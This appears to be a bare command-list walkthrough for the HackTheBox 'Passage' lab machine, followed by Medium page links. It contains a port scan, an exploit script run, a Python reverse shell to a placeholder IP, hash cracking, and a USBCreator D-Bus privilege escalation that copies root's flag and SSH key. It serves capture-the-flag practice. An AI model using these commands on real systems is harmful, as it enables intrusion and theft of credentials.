Passage-HackTheBox

nmap -p- --min-rate 10000 -oA nmap_all_tcp 10.10.10.206
nmap -p 22,80 -sC -sV 10.10.10.206
python3 ./48800.py
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR IP",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
nc -lvnp 4242
python3 -c "import pty;pty.spawn('/bin/bash')"
cat /var/www/html/CuteNews/cdata/users/lines
john --wordlist=<YOUR-WORDLIST> --format=raw-sha256 user.txt
echo “e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd” > user.txt
ssh nadav@10.10.10.206
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/root.txt /root.txt true
gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /id_rsa true

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Cyber Training Through Games and AI

#29: How Privacy Will Shape Society and Business (w/ Daniel Solove)

CYBER & IT’S WORLD

OODA v PDSA by example

Knowledge Banking Infrastructure: Cyber Socio-Economic Foundations for our shared world

Insuring Your Business Against Cyber Risks (Part Two — Data Breaches)

Consumers and business are becoming more proactive against cyberattacks.

ann04. Big announcement for PoFi holders

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Sidharth R

Sidharth R

More from Medium

Pickle Rick — TryHackMe Writeup

TryHackMe | RootMe | Walkthrough | Detailed Write Up

TryHackMe | RootMe | Walkthrough |Detailed Write Up | MZS

TryHackMe — LazyAdmin (Easy)

HTB Resolute Machine Walkthrough.